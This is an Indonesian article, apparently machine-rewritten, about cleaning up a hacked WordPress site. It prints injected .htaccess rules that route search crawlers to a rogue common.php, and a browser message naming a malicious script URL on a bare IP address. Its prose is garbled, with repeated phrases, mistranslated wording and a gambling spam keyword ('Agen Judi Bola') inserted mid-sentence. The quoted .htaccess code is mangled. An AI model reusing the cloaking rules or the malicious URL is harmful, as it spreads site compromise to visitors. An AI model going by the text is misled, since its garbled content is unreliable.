Pemeliharaan WordPress Adalah Penting

Pemeliharaan WordPress Adalah Penting

Pemeliharaan WordPress Adalah Penting

Membiarkan Situs Anda Terbuka Untuk Menyerang

Dalam posting sebelumnya kami berbicara tentang pentingnya keamanan dan keamanan WordPress serta menjaga situs web Anda (inti dan plugin WordPress) untuk mencegah situs Anda diretas. Kami juga memeriksa cara terbaik untuk merapikan situs Agen Judi Bola WordPress yang telah terancam oleh kode berbahaya.

Dalam artikel ini, kami melihat situs yang diretas, apa yang kami temukan, dan bagaimana tepatnya itu diselesaikan.

Beberapa Statistik

Sudah jelas bahwa banyak pemilik situs lupa untuk menjaga situs mereka dengan baik, membiarkan mereka terbuka untuk serangan.

Penelitian pada 1Q 2016 oleh Sucuri mengidentifikasi bahwa dari 11.000 situs internet yang terinfeksi, 75% menggunakan sistem WordPress, dan lebih dari 50% dari instalasi tersebut tidak ada hari.

Bagaimana Saya Tahu Jika Situs Saya Telah Diretas?

Banyak orang berpikir sangat mudah mengetahui kapan situs web mereka diretas. Namun demikian ada kalanya sebuah hack disembunyikan misalnya dokumen dan juga folder yang terdiri dari kode destruktif yang diunggah serta kecuali jika Anda menggunakan plugin keamanan dan keamanan, itu bisa sepenuhnya tidak terdeteksi sampai situs Anda ditandai oleh Google sebagai “Situs ini mungkin diretas”.

Pada Maret 2012, ZDNet melaporkan:

“Lebih dari 90% [pemilik situs internet] benar-benar tidak melihat tugas aneh, meskipun situs web mereka disalahgunakan untuk mengirim spam, menghosting laman web phishing, atau menyebarkan malware serta 63% pemilik situs web tidak tahu persis bagaimana mereka diretas “.

Dalam berbagai kasus lain, situs yang diretas mungkin sangat tidak terlihat. Beberapa indikasi umum meliputi:

Situs web Anda mengalihkan ke URL web lain (segera atau setelah waktu yang singkat).
Popup menunjukkan bahwa Anda tidak berlaku.
Kode muncul di bagian kepala, materi, bilah sisi atau footer situs Anda.
Hyperlink ke situs web lain muncul.
Keamanan dan keamanan atau berbagai plugin lainnya dimatikan.
Pelanggan baru ditambahkan yang tidak Anda kenali.
Latar Belakang Situs Yang Diretas
Masalah pertama yang diingat ketika pengunjung situs yang mencoba menjangkau situs web menemukan bahwa ketika mereka mencari melalui Google, tautan ke situs web memuat laman web kosong, namun memasukkan URL situs web ke bilah alamat membawa situs web tanpa masalah .

Itu terletak bahwa Google tidak dapat mengindeks situs karena the.htaccess dokumen sebenarnya telah diubah (halaman web situs web akan berkemas namun halaman kosong disajikan).

Pemeliharaan WordPress Adalah Penting

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond% (google | yahoo | aol | bing | crawl | aspseek | icio | robot | crawler | nutch | slurp | msnbot) [OR] RewriteCond% (google | aol | yahoo | msn | search | bing).
RewriteCond% REQUEST_URI / $ [OR] RewriteCond% (html | htm | php) $ [NC] RewriteCond%! common.php.
RewriteCond% DOCUMENT_ROOT / common.php -f.
RewriteRule ^. * $ / common.php [L] <IfModule>
<IfModule rewrite_module>
RewriteEngine di.
RewriteBase /.
RewriteCond%! ^ pada $ [NC] RewriteCond%! ^ https $ [NC] RewriteRule. * https: //% HTTP_HOST% [R = 301, L] <IfModule>

Ketika kode di atas dalam dokumen .htaccess telah dihapus dan juga kode Begin Force SSL yang sesuai telah dimasukkan, sitemap dimuat ulang di Google Webmaster Tools dan Google memiliki kemampuan untuk mengindeks situs web. Ini memecahkan masalah tautan web Pemeliharaan WordPress Adalah Penting.

Selanjutnya kami menemukan bahwa halaman rumah (https) sedang dikemas di Firefox dengan pesan yang mengatakan bahwa ada bagian dari halaman web yang tidak dapat diisi (dan telah diblokir) karena tidak aman. Investigasi lebih lanjut di Konsol Google Chrome menyoroti bahwa laman web mencoba mengemas konten campuran :.

“Halaman web di ‘https://www.siteURL.com/’ diisi melalui HTTPS, namun meminta naskah yang tidak dikenal ‘http://5.45.67.97/1/jquery.js.php?r=&u=Mozilla/ 5.0% 20 (Windows% 20NT% 206.1;% 20 Win64;% 20×64)% 20AppleWebKit / 537.36% 20 (KHTML,% 20like% 20Gecko)% 20Chrome / 62.0.3202. 94% 20 Safari / 537.36 ‘. Permintaan ini sebenarnya telah dihalangi; konten perlu ditawarkan melalui HTTPS. “.